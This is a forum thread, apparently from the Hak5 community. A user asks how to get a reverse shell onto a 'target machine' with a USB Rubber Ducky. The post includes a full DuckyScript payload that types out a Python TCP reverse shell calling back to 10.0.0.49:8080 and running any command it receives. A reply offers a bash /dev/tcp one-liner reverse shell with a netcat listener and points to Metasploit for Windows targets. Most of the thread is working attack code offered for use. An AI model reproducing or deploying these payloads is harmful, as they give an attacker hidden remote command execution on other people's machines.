Skylord Posted March 4, 2018 Share Posted March 4, 2018 Hello Hak5 Community! I have a quick newbie question. I created a Duck script that is supposed to deliver a Python TCP Reverse Shell through the python interpreter, but it is too much for the interpreter to handle. How do I get a pre-created script onto a target machine using the rubber ducky? Very confused. Here is my script, it is too much I know :( : DELAY 2000 CTRL ESC DELAY 1000 STRING Python DELAY 200 ENTER DELAY 500 STRING import socket ENTER DELAY 200 STRING import subprocess ENTER DELAY 200 STRING def connect(): ENTER DELAY 200 STRING s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ENTER DELAY 200 STRING s.connect(("10.0.0.49", 8080)) ENTER DELAY 200 STRING while True: ENTER DELAY 200 STRING command = s.recv(1024) ENTER DELAY 200 STRING if 'terminate' in command: ENTER DELAY 200 STRING s.close ENTER DELAY 200 STRING break ENTER DELAY 200 STRING else: ENTER DELAY 200 STRING CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) ENTER DELAY 200 STRING s.send(CMD.stdout.read()) ENTER DELAY 200 STRING s.send(cmd.stderr.read()) ENTER DELAY 200 STRING def main(): ENTER DELAY 200 STRING connect() ENTER DELAY 200 STRING main() ENTER Quote Link to comment Share on other sites More sharing options...
sub0 Posted March 4, 2018 Share Posted March 4, 2018 If you really want to use Python, have the Ducky grab the script from a server (Or hastebin). However, there are much easier ways to accomplish a backdoor. You can just execute this command: `bash -i >& /dev/tcp/pentesterIPaddr/5000 0>&1` on UNIX systems and catch the shell with Netcat. (nc -l -p 5000) Quote Link to comment Share on other sites More sharing options...
Skylord Posted March 5, 2018 Author Share Posted March 5, 2018 Thank you for the reply sub0! Would that bash command work in Windows 10 Powershell? Thank you. Quote Link to comment Share on other sites More sharing options...
sub0 Posted March 5, 2018 Share Posted March 5, 2018 No, that command is for UNIX platforms. If you are targeting Windows, you could use Metasploit. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.